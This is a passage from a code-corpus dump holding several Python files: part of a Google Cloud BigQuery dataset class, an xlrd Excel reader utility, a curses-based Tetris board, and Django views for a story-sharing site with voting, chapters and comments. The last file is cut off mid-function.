self.name)\n connection = self._client.connection\n resp = connection.api_request(method='GET', path=path,\n query_params=params)\n tables = [Table.from_api_repr(resource, self)\n for resource in resp['tables']]\n return tables, resp.get('nextPageToken')\n\n def table(self, name, schema=()):\n \"\"\"Construct a table bound to this dataset.\n\n :type name: string\n :param name: Name of the table.\n\n :type schema: list of :class:`gcloud.bigquery.table.SchemaField`\n :param schema: The table's schema\n\n :rtype: :class:`gcloud.bigquery.table.Table`\n :returns: a new ``Table`` instance\n \"\"\"\n return Table(name, dataset=self, schema=schema)\n", "sub_path": "src/lib/gcloud/bigquery/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 18657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "gcloud._helpers._datetime_from_microseconds", "line_number": 120, "usage_type": "call"}, {"api_name": "gcloud._helpers._datetime_from_microseconds", "line_number": 150, "usage_type": "call"}, {"api_name": "six.integer_types", "line_number": 179, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 201, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 223, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 245, "usage_type": "attribute"}, {"api_name": "gcloud.exceptions.NotFound", "line_number": 386, "usage_type": "name"}, {"api_name": "six.integer_types", "line_number": 428, "usage_type": "attribute"}, {"api_name": "gcloud.bigquery.table.Table.from_api_repr", "line_number": 506, "usage_type": "call"}, {"api_name": "gcloud.bigquery.table.Table", "line_number": 506, "usage_type": "name"}, {"api_name": "gcloud.bigquery.table.Table", "line_number": 522, "usage_type": "call"}]} +{"seq_id": "317436997", "text": "# -*- coding: utf-8 -*- \n\n__author__ = \"Mr-Li\"\n__date__ = \"2019/1/10 22:05\"\n\nimport xlrd\nimport json\nimport os\nimport datetime\n\n\nclass ExcelUtil(object):\n\n def __init__(self, excel_file, sheet_index=0):\n \"\"\"\n 初始化excel对象,并创建sheet实例属性\n :param excel_file: excel文件的位置\n :param sheet_index: sheet的索引,默认为0\n \"\"\"\n self.file = os.path.abspath(excel_file)\n _work_book = xlrd.open_workbook(self.file)\n self.sheet = _work_book.sheet_by_index(sheet_index)\n self._data_set = []\n\n def __repr__(self):\n \"\"\"\n 返回自定义excel的信息,供debug显示\n :return: excel_info\n \"\"\"\n date = datetime.datetime.fromtimestamp(os.path.getmtime(self.file))\n modify_time = date.strftime('%Y-%m-%d %H:%M:%S')\n key_title = \",\".join(self.sheet.row_values(0, end_colx=self.n_col-1))\n info = {\n \"sheet_index\": self.sheet.number,\n \"sheet_name\": self.sheet.name,\n \"row_number\": self.n_row,\n \"col_number\": self.n_col,\n \"key_str\": key_title,\n \"excel_file\": self.file,\n \"last_modify_time\": modify_time\n }\n return json.dumps(info)\n\n def __getitem__(self, item):\n \"\"\"\n 设置成可迭代的对象,直接对excel里面的数据迭代获取,异常后停止输出\n :param item: row_number\n :return: row_values\n \"\"\"\n return self.sheet.row_values(item+1)\n\n @property\n def n_row(self):\n \"\"\"\n 属性方法,获取表格的行数\n :return:\n \"\"\"\n return self.sheet.nrows\n\n @property\n def n_col(self):\n \"\"\"\n 属性方法,获取表格的列数\n :return:\n \"\"\"\n return self.sheet.ncols\n\n def cell_value(self, n_row, n_col):\n \"\"\"\n 获取单元格的值\n :param n_row: 行号\n :param n_col: 列号\n :return: string\n \"\"\"\n return self.sheet.cell_value(n_row, n_col)\n\n def iterator_data(self, start_number=1):\n \"\"\"\n 迭代器形式填充数据,适合数据比较大的excel文件, 默认去除标题\n :return:\n \"\"\"\n for row_number in range(start_number, self.n_row):\n yield self.sheet.row_values(row_number)\n\n def all_data(self, start_number=1):\n \"\"\"\n 获取excel的所有数据,并返回一个list, 默认去除标题\n :return:\n \"\"\"\n for row_number in range(start_number, self.n_row):\n self._data_set.append(self.sheet.row_values(row_number))\n return self._data_set\n\n\nif __name__ == '__main__':\n excel = ExcelUtil(\"demo.xls\")\n print(excel.n_row, excel.n_col)\n print(excel.all_data())\n print(excel)\n\n", "sub_path": "test_data_for_excel.py", "file_name": "test_data_for_excel.py", "file_ext": "py", "file_size_in_byte": 2816, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.abspath", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "xlrd.open_workbook", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "445244198", "text": "import copy\nimport curses\nimport math\n\nfrom pieces import Shape\n\n\nclass Board(object):\n '''Maintains the entire state of the game.'''\n\n def __init__(self, columns=None, rows=None, level=None):\n self.num_rows = rows\n self.num_columns = columns\n self.array = [[None for _ in range(self.num_columns)] for _ in range(self.num_rows)]\n self.falling_shape = None\n self.next_shape = None\n self.score = 0\n self.level = level or 1\n self.preview_column = 12\n self.preview_row = 1\n self.starting_column = 4\n self.starting_row = 0\n self.drawer = BoardDrawer(self)\n self.points_per_line = 20\n self.points_per_level = 200\n\n def start_game(self):\n self.score = 0\n self.level = 1\n if self.next_shape is None:\n self.next_shape = Shape.random(self.preview_column, self.preview_row)\n self.new_shape()\n\n def end_game(self):\n raise GameOverError(score=self.score, level=self.level)\n\n def new_shape(self):\n self.falling_shape = self.next_shape\n self.falling_shape.move_to(self.starting_column, self.starting_row)\n self.next_shape = Shape.random(self.preview_column, self.preview_row)\n if self.shape_cannot_be_placed(self.falling_shape):\n self.next_shape = self.falling_shape\n self.falling_shape = None\n self.next_shape.move_to(self.preview_column, self.preview_row)\n self.end_game()\n\n def remove_completed_lines(self):\n rows_removed = []\n lowest_row_removed = 0\n for row in self.array:\n if all(row):\n lowest_row_removed = max(lowest_row_removed, row[0].row_position)\n rows_removed.append(copy.deepcopy(row))\n for block in row:\n self.array[block.row_position][block.column_position] = None\n if len(rows_removed) > 0:\n points_earned = math.pow(2, len(rows_removed) - 1) * self.points_per_line\n self.score += points_earned\n if self.score > self.points_per_level * self.level:\n self.level += 1\n\n for column_index in range(0, self.num_columns):\n for row_index in range(lowest_row_removed, 0, -1):\n block = self.array[row_index][column_index]\n if block:\n # Number of rows removed that were below this one\n distance_to_drop = len(\n [row for row in rows_removed if\n row[0].row_position > block.row_position]\n )\n new_row_index = row_index + distance_to_drop\n self.array[row_index][column_index] = None\n self.array[new_row_index][column_index] = block\n block.row_position = new_row_index\n\n def settle_falling_shape(self):\n '''Resolves the current falling shape.'''\n\n if self.falling_shape:\n self._settle_shape(self.falling_shape)\n self.falling_shape = None\n self.new_shape()\n\n def _settle_shape(self, shape):\n '''Adds shape to settled pieces array.'''\n\n if shape:\n for block in shape.blocks:\n self.array[block.row_position][block.column_position] = block\n self.remove_completed_lines()\n\n def move_shape_left(self):\n if self.falling_shape:\n self.falling_shape.shift_shape_left_by_one_column()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.shift_shape_right_by_one_column()\n return False\n return True\n\n def move_shape_right(self):\n if self.falling_shape:\n self.falling_shape.shift_shape_right_by_one_column()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.shift_shape_left_by_one_column()\n return False\n return True\n\n def rotate_shape(self):\n if self.falling_shape:\n self.falling_shape.rotate_clockwise()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.rotate_counterclockwise()\n return False\n return True\n\n def let_shape_fall(self):\n '''What happens during every `tick`. Also what happens when the user hits down arrow.'''\n\n if self.falling_shape:\n self.falling_shape.lower_shape_by_one_row()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.raise_shape_by_one_row()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.end_game()\n else:\n self.settle_falling_shape()\n return True\n\n def drop_shape(self):\n '''When you hit the enter arrow and the piece goes all the way down.'''\n\n if self.falling_shape:\n while not self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.lower_shape_by_one_row()\n self.falling_shape.raise_shape_by_one_row()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.end_game()\n else:\n self.settle_falling_shape()\n return True\n\n def shape_cannot_be_placed(self, shape):\n '''Determines whether a shape can successfully be placed.'''\n\n for block in shape.blocks:\n if (block.column_position < 0 or\n block.column_position >= self.num_columns or\n block.row_position < 0 or\n block.row_position >= self.num_rows or\n self.array[block.row_position][block.column_position] is not None):\n return True\n return False\n\n\nclass BoardDrawer(object):\n '''Manages drawing the board.'''\n\n def __init__(self, board):\n stdscr = curses.initscr()\n stdscr.nodelay(1)\n curses.start_color()\n curses.init_pair(1, curses.COLOR_RED, curses.COLOR_RED)\n curses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_BLUE)\n curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_GREEN)\n curses.init_pair(4, curses.COLOR_MAGENTA, curses.COLOR_MAGENTA)\n curses.init_pair(5, curses.COLOR_CYAN, curses.COLOR_CYAN)\n curses.init_pair(6, curses.COLOR_YELLOW, curses.COLOR_YELLOW)\n curses.init_pair(7, curses.COLOR_WHITE, curses.COLOR_BLACK)\n curses.init_pair(8, curses.COLOR_BLACK, curses.COLOR_WHITE)\n curses.init_pair(10, 10, 10)\n curses.cbreak()\n stdscr.keypad(1)\n curses.nonl()\n curses.curs_set(0)\n curses.noecho()\n self.stdscr = stdscr\n self.preview_column = board.preview_column\n self.preview_row = board.preview_row\n self.num_rows = board.num_rows\n self.num_columns = board.num_columns\n self.block_width = 2\n self.border_width = 1\n\n def update_falling_piece(self, board):\n '''Adds the currently falling pieces to the next stdscr to be drawn.'''\n\n if board.falling_shape:\n for block in board.falling_shape.blocks:\n self.stdscr.addstr(\n block.row_position + self.border_width,\n self.block_width * block.column_position + self.border_width,\n ' ' * self.block_width,\n curses.color_pair(block.color)\n )\n\n def update_settled_pieces(self, board):\n '''Adds the already settled pieces to the next stdscr to be drawn.'''\n\n for (r_index, row) in enumerate(board.array):\n for (c_index, value) in enumerate(row):\n block = value\n if block:\n color_pair = block.color\n else:\n color_pair = 0\n self.stdscr.addstr(\n r_index + self.border_width,\n c_index * self.block_width + self.border_width,\n ' ' * self.block_width,\n curses.color_pair(color_pair)\n )\n\n def update_shadow(self, board):\n '''Adds the 'shadow' of the falling piece to the next stdscr to be drawn.'''\n\n # Projects a shadow of where the piece will land.\n shadow = copy.deepcopy(board.falling_shape)\n if shadow:\n while not board.shape_cannot_be_placed(shadow):\n shadow.lower_shape_by_one_row()\n shadow.raise_shape_by_one_row()\n for block in shadow.blocks:\n self.stdscr.addstr(\n block.row_position + self.border_width,\n self.block_width * block.column_position + self.border_width,\n ' ' * self.block_width,\n curses.color_pair(8))\n\n def update_next_piece(self, board):\n '''Adds the next piece to the next stdscr to be drawn.'''\n\n if board.next_shape:\n for preview_row_offset in range(4):\n self.stdscr.addstr(\n self.preview_row + preview_row_offset + self.border_width,\n (self.preview_column - 1) * self.block_width + self.border_width * 2,\n ' ' * self.block_width,\n curses.color_pair(0)\n )\n for block in board.next_shape.blocks:\n self.stdscr.addstr(\n block.row_position + self.border_width,\n block.column_position * self.block_width + self.border_width * 2,\n ' ' * self.block_width,\n curses.color_pair(block.color)\n )\n\n def update_score_and_level(self, board):\n '''Adds the score and level to the next stdscr to be drawn.'''\n\n # Level\n self.stdscr.addstr(\n 5 + self.border_width,\n self.preview_column * self.block_width - 2 + self.border_width,\n 'LEVEL: %d' % board.level,\n curses.color_pair(7)\n )\n # Score\n self.stdscr.addstr(\n 6 + self.border_width,\n self.preview_column * self.block_width - 2 + self.border_width,\n 'SCORE: %d' % board.score,\n curses.color_pair(7)\n )\n\n def clear_score(self):\n '''Does what it says on the tin.'''\n\n # Level\n self.stdscr.addstr(\n 5 + self.border_width,\n self.preview_column * self.block_width - 2 + self.border_width,\n 'LEVEL: ',\n curses.color_pair(7)\n )\n # Score\n self.stdscr.addstr(\n 6 + self.border_width,\n self.preview_column * self.block_width - 2 + self.border_width,\n 'SCORE: ',\n curses.color_pair(7)\n )\n\n def update_border(self):\n '''Adds the border to the next stdscr to be drawn.'''\n\n # Side borders\n for row_position in range(self.num_rows + self.border_width * 2):\n self.stdscr.addstr(row_position, 0, '|', curses.color_pair(7))\n self.stdscr.addstr(row_position, self.num_columns * self.block_width + 1, '|', curses.color_pair(7))\n # Top and bottom borders\n for column_position in range(self.num_columns * self.block_width + self.border_width * 2):\n self.stdscr.addstr(0, column_position, '-', curses.color_pair(7))\n self.stdscr.addstr(self.num_rows + 1, column_position, '-', curses.color_pair(7))\n\n def update(self, board):\n '''Updates all visual board elements and then refreshes the screen.'''\n\n self.update_border()\n self.update_score_and_level(board)\n self.update_next_piece(board)\n self.update_settled_pieces(board)\n self.update_falling_piece(board)\n self.update_shadow(board)\n self.refresh_screen()\n\n def refresh_screen(self):\n stdscr = self.stdscr\n stdscr.refresh()\n\n\nclass GameOverError(Exception):\n def __init__(self, score, level):\n super(GameOverError).__init__(GameOverError)\n self.score = score\n self.level = level", "sub_path": "board.py", "file_name": "board.py", "file_ext": "py", "file_size_in_byte": 12190, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pieces.Shape.random", "line_number": 31, "usage_type": "call"}, {"api_name": "pieces.Shape", "line_number": 31, "usage_type": "name"}, {"api_name": "pieces.Shape.random", "line_number": 40, "usage_type": "call"}, {"api_name": "pieces.Shape", "line_number": 40, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 53, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 57, "usage_type": "call"}, {"api_name": "curses.initscr", "line_number": 159, "usage_type": "call"}, {"api_name": "curses.start_color", "line_number": 161, "usage_type": "call"}, {"api_name": "curses.init_pair", "line_number": 162, "usage_type": "call"}, {"api_name": "curses.COLOR_RED", "line_number": 162, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 163, "usage_type": "call"}, {"api_name": "curses.COLOR_BLUE", "line_number": 163, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 164, "usage_type": "call"}, {"api_name": "curses.COLOR_GREEN", "line_number": 164, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 165, "usage_type": "call"}, {"api_name": "curses.COLOR_MAGENTA", "line_number": 165, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 166, "usage_type": "call"}, {"api_name": "curses.COLOR_CYAN", "line_number": 166, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 167, "usage_type": "call"}, {"api_name": "curses.COLOR_YELLOW", "line_number": 167, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 168, "usage_type": "call"}, {"api_name": "curses.COLOR_WHITE", "line_number": 168, "usage_type": "attribute"}, {"api_name": "curses.COLOR_BLACK", "line_number": 168, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 169, "usage_type": "call"}, {"api_name": "curses.COLOR_BLACK", "line_number": 169, "usage_type": "attribute"}, {"api_name": "curses.COLOR_WHITE", "line_number": 169, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 170, "usage_type": "call"}, {"api_name": "curses.cbreak", "line_number": 171, "usage_type": "call"}, {"api_name": "curses.nonl", "line_number": 173, "usage_type": "call"}, {"api_name": "curses.curs_set", "line_number": 174, "usage_type": "call"}, {"api_name": "curses.noecho", "line_number": 175, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 193, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 210, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 217, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 227, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 238, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 245, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 256, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 263, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 274, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 281, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 289, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 290, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 293, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 294, "usage_type": "call"}]} +{"seq_id": "59716455", "text": "# standard library imports\nimport re # praw\nfrom xml.etree.ElementTree import Element, SubElement, tostring # for rss\nimport json # for temporary story api. Replace with REST.\nimport feedparser\n\n# core django components\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core.urlresolvers import * # for rss\n# for 404\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n# date\nfrom datetime import datetime\nfrom time import mktime\n\n# My own stuff\n# utility functions\nfrom comments.utils import get_comment_list\nfrom .utils import rank_hot, rank_top\n# Forms\nfrom .forms import StoryForm, ChapterForm\nfrom comments.forms import CommentForm\nfrom hubs.forms import HubForm\n# Models\nfrom .models import Story, Chapter\nfrom profiles.models import User\nfrom hubs.models import Hub\nfrom comments.models import Comment\n\n\ndef stories(request, rankby=\"hot\", timespan=\"all-time\",\n filterby=\"\", hubslug=\"\", username=\"\"):\n # for user profile navbar\n userprofile = []\n if not request.user.is_anonymous():\n subscribed_to = request.user.subscribed_to.all()\n else:\n subscribed_to = []\n \n if filterby == \"subscriptions\":\n subscribed_to = request.user.subscribed_to.all()\n stories = Story.objects.filter(author=subscribed_to, published=True)\n filterurl=\"/subscriptions\" # to add to href in subnav\n elif filterby == \"hub\":\n hub = Hub.objects.get(slug=hubslug)\n # Show stories from all the children hubs? Don't know how to sort.\n # children = Hub.objects.filter(parent=hub)\n # hubs = []\n stories = Story.objects.filter(hubs=hub, published=True)\n filterurl=\"/hub/\"+hubslug # to add to href in subnav\n elif filterby == \"user\":\n userprofile = get_object_or_404(User, username=username)\n if request.user == userprofile:\n # If it's my profile - display all the stories, even unpublished.\n stories = Story.objects.filter(author=userprofile)\n else:\n stories = Story.objects.filter(author=userprofile, published=True)\n filterurl=\"/user/\"+username # to add to href in subnav\n else:\n stories = Story.objects.filter(published=True)\n filterurl=\"\" # to add to href in subnav \n\n if rankby == \"hot\":\n story_list = rank_hot(stories, top=32)\n elif rankby == \"top\":\n story_list = rank_top(stories, timespan = timespan)\n elif rankby == \"new\":\n story_list = stories.order_by('-pub_date')\n else:\n story_list = []\n\n\n # Pagination\n paginator = Paginator(story_list, 25)\n page = request.GET.get('page')\n try:\n stories = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n stories = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n stories = paginator.page(paginator.num_pages) \n\n # Disable upvoted/downvoted\n if request.user.is_authenticated():\n upvoted = request.user.upvoted.all()\n downvoted = request.user.downvoted.all() \n else:\n upvoted = []\n downvoted = [] \n\n \n # if not stories:\n # return HttpResponseRedirect('/404')\n\n hubs = Hub.objects.all().order_by('id')\n\n return render(request, 'stories/stories.html',{\n 'stories':stories,\n 'upvoted': upvoted,\n 'downvoted': downvoted,\n 'filterby':filterby,\n 'filterurl': filterurl, \n 'rankby': rankby,\n 'timespan': timespan,\n 'userprofile':userprofile,\n 'subscribed_to': subscribed_to,\n 'hubs': hubs\n })\n\n# Voting\ndef upvote(request):\n story = get_object_or_404(Story, id=request.POST.get('post-id'))\n story.score += 1\n story.save()\n story.author.karma += 1\n story.author.save()\n user = request.user\n user.upvoted.add(story)\n user.save()\n return HttpResponse()\n\ndef downvote(request):\n story = get_object_or_404(Story, id=request.POST.get('post-id'))\n if story.score > 0:\n story.score -= 1\n story.author.karma -= 1 \n story.save()\n story.author.save()\n user = request.user\n user.downvoted.add(story)\n user.save()\n return HttpResponse()\n\ndef unupvote(request):\n story = get_object_or_404(Story, id=request.POST.get('post-id'))\n story.score -= 1\n story.save()\n story.author.karma = 1\n story.author.save()\n user = request.user\n user.upvoted.remove(story)\n user.save()\n return HttpResponse()\n\ndef undownvote(request):\n story = get_object_or_404(Story, id=request.POST.get('post-id'))\n story.score += 1\n story.author.karma += 1 \n story.save()\n story.author.save()\n user = request.user\n user.downvoted.remove(story)\n user.save()\n return HttpResponse()\n \ndef story(request, story, comment_id=\"\", chapter=\"\", rankby=\"new\", filterby=\"\"):\n try:\n story = Story.objects.get(slug=story)\n except:\n return HttpResponseRedirect('/404')\n \n\n try:\n first_chapter = Chapter.objects.get(story=story, number=1)\n except:\n first_chapter = []\n \n\n # If chapter\n if chapter:\n chapter = Chapter.objects.get(slug=chapter)\n first_chapter = [] # empty first chapter to show the right button in story template\n try:\n prev_chapter = Chapter.objects.get(story=story, number=chapter.number-1)\n except:\n prev_chapter = []\n\n try:\n next_chapter = Chapter.objects.get(story=story, number=chapter.number+1)\n except:\n next_chapter = []\n else:\n chapter = []\n prev_chapter = []\n next_chapter = []\n \n \n hubs = story.hubs.all()\n \n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False) # return story but don't save it to db just yet\n comment.author = request.user\n comment.parent = None\n if chapter:\n comment.chapter = chapter \n else:\n comment.story = story\n comment.save()\n if comment.comment_type == 1:\n if chapter:\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'#comments')\n else:\n return HttpResponseRedirect('/story/'+story.slug+'#comments')\n else:\n if chapter:\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'/reviews#comments')\n else:\n return HttpResponseRedirect('/story/'+story.slug+'/reviews#comments')\n \n else:\n form = CommentForm()\n\n if request.user.is_authenticated():\n upvoted = request.user.upvoted.all()\n downvoted = request.user.downvoted.all() \n else:\n upvoted = []\n downvoted = [] \n\n # For subscribe button\n if not request.user.is_anonymous():\n subscribed_to = request.user.subscribed_to.all()\n else:\n subscribed_to = []\n\n\n # Get top lvl comments\n if filterby == \"reviews\":\n filterurl = \"reviews\"\n if chapter:\n top_lvl_comments = Comment.objects.filter(chapter = chapter,\n comment_type=2,\n parent = None)\n else:\n top_lvl_comments = Comment.objects.filter(story = story,\n comment_type=2,\n parent = None)\n else:\n if chapter:\n top_lvl_comments = Comment.objects.filter(chapter = chapter,\n comment_type=1,\n parent = None)\n else:\n top_lvl_comments = Comment.objects.filter(story = story,\n comment_type=1,\n parent = None)\n\n # Rank comments\n if rankby == \"hot\":\n ranked_comments = rank_hot(top_lvl_comments, top=32)\n elif rankby == \"top\":\n ranked_comments = rank_top(top_lvl_comments, timespan = \"all-time\")\n elif rankby == \"new\":\n ranked_comments = top_lvl_comments.order_by('-pub_date')\n else:\n ranked_comments = []\n\n # Permalink to one comment\n if comment_id:\n comment = []\n comment.append(Comment.objects.get(id = comment_id))\n ranked_comments = comment\n\n\n # Nested comments\n comments = list(get_comment_list(ranked_comments, rankby=rankby))\n\n if request.user.is_authenticated():\n comments_upvoted = request.user.comments_upvoted.all()\n comments_downvoted = request.user.comments_downvoted.all() \n else:\n comments_upvoted = []\n comments_downvoted = [] \n\n return render(request, 'stories/story.html',{\n 'story': story,\n 'first_chapter':first_chapter,\n 'chapter': chapter,\n 'prev_chapter': prev_chapter,\n 'next_chapter': next_chapter, \n 'upvoted': upvoted,\n 'downvoted': downvoted,\n 'comments_upvoted': comments_upvoted,\n 'comments_downvoted': comments_downvoted,\n 'comments': comments,\n 'rankby': rankby, \n 'form': form,\n 'hubs':hubs,\n 'subscribed_to':subscribed_to,\n 'filterby':filterby\n })\n\ndef chapter_back(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter) \n comments = Comment.objects.filter(chapter = chapter) \n\n try:\n prev_chapter = Chapter.objects.get(story=story, number=chapter.number-1)\n except:\n prev_chapter = []\n\n try:\n next_chapter = Chapter.objects.get(story=story, number=chapter.number+1)\n except:\n next_chapter = []\n\n hubs = story.hubs.all()\n \n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False) # return story but don't save it to db just yet\n comment.author = request.user\n comment.parent = None\n # comment.story = story\n comment.chapter = chapter \n comment.save()\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'#comments')\n else:\n form = CommentForm()\n\n if request.user.is_authenticated():\n upvoted = request.user.upvoted.all()\n downvoted = request.user.downvoted.all() \n else:\n upvoted = []\n downvoted = [] \n \n return render(request, 'stories/chapter.html',{\n 'story': story,\n 'chapter': chapter,\n 'prev_chapter': prev_chapter,\n 'next_chapter': next_chapter, \n 'upvoted': upvoted,\n 'downvoted': downvoted, \n 'comments': comments, \n 'form': form,\n 'hubs':hubs,\n })\n\n\ndef story_create(request):\n if request.method == 'POST':\n form = StoryForm(request.POST)\n if form.is_valid():\n story = form.save(commit=False) # return story but don't save it to db just yet\n story.author = request.user\n # self upvote\n story.score += 1\n story.save()\n request.user.upvoted.add(story) \n story.hubs.add(*form.cleaned_data['hubs'])\n hubs = story.hubs.all()\n for hub in hubs:\n if hub.parent:\n story.hubs.add(hub.parent)\n # Hacky way to \n # for hub in form.cleaned_data['hubs']:\n # if hub.parent:\n # story.hubs.add(hub.parent)\n # if hub.parent.parent:\n # story.hubs.add(hub.parent.parent)\n return HttpResponseRedirect('/story/'+story.slug+'/edit')\n else:\n form = StoryForm()\n form.fields[\"hubs\"].queryset = Hub.objects.filter(children=None).order_by('id')\n\n return render(request, 'stories/story-create.html', {\n 'form':form,\n 'hubs':Hub.objects.all()\n })\n\n\ndef chapter_create(request, story):\n story = Story.objects.get(slug=story) \n if request.method == 'POST':\n form = ChapterForm(request.POST)\n if form.is_valid():\n # return HttpResponseRedirect('/asdf') \n chapter = form.save(commit=False) # return story but don't save it to db just yet\n chapter.story = story\n chapter.number = story.chapters.count()+1\n chapter.save()\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'/edit')\n else:\n form = ChapterForm()\n \n return render(request, 'stories/edit.html', {\n 'story':story, \n 'form':form,\n 'action':'chapter_create' \n })\n\n\ndef story_edit(request, story):\n story = Story.objects.get(slug=story)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n if request.method == 'POST':\n form = StoryForm(request.POST,instance=story)\n if form.is_valid():\n story = form.save(commit=False) # return story but don't save it to db just yet\n story.save()\n story.hubs = []\n story.hubs.add(*form.cleaned_data['hubs'])\n hubs = story.hubs.all()\n for hub in hubs:\n if hub.parent:\n story.hubs.add(hub.parent)\n return HttpResponseRedirect('/story/'+story.slug+'/edit')\n else:\n form = StoryForm(instance=story)\n form.fields[\"hubs\"].queryset = Hub.objects.filter(children=None).order_by('id') \n \n return render(request, 'stories/edit.html', {\n 'story':story,\n 'form':form,\n 'action':'story_edit'\n })\n\ndef chapter_edit(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n \n if request.method == 'POST':\n form = ChapterForm(request.POST,instance=chapter)\n if form.is_valid():\n chapter = form.save(commit=False) # return story but don't save it to db just yet\n chapter.save()\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'/edit')\n else:\n form = ChapterForm(instance=chapter)\n \n return render(request, 'stories/edit.html', {\n 'story':story,\n 'chapter':chapter,\n 'form':form,\n 'action':'chapter_edit' \n })\n\ndef chapter_up(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter) # add story=story, to not confuse with others!\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n try:\n following_chapter = story.chapters.get(number=chapter.number+1)\n following_chapter.number -= 1\n following_chapter.save()\n except:\n pass\n\n chapter.number += 1\n chapter.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER')) \n\ndef chapter_down(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter) # add story=story, to not confuse with others!\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n if chapter.number > 0: \n try:\n following_chapter = story.chapters.get(number=chapter.number-1)\n following_chapter.number += 1\n following_chapter.save()\n except:\n pass\n\n chapter.number -= 1\n chapter.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef chapter_delete(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter) # add story=story, to not confuse with others!\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n chapter.delete()\n return HttpResponseRedirect('/story/'+story.slug+'/edit') \n\ndef story_delete(request, story):\n story = Story.objects.get(slug=story)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n story.delete()\n return HttpResponseRedirect('/') # to story list\n\ndef story_publish(request, story):\n story = Story.objects.get(slug=story)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n story.published = True\n story.save()\n return HttpResponseRedirect('/story/'+story.slug+'/edit')\n\ndef story_unpublish(request, story):\n story = Story.objects.get(slug=story)\n\n # throw him out if he's not an author\n if request.user != story.author:\n return HttpResponseRedirect('/') \n\n story.published = False\n story.save()\n return HttpResponseRedirect('/story/'+story.slug+'/edit')\n\n\n\n\ndef page_404(request):\n response = render_to_response('404.html', {},\n 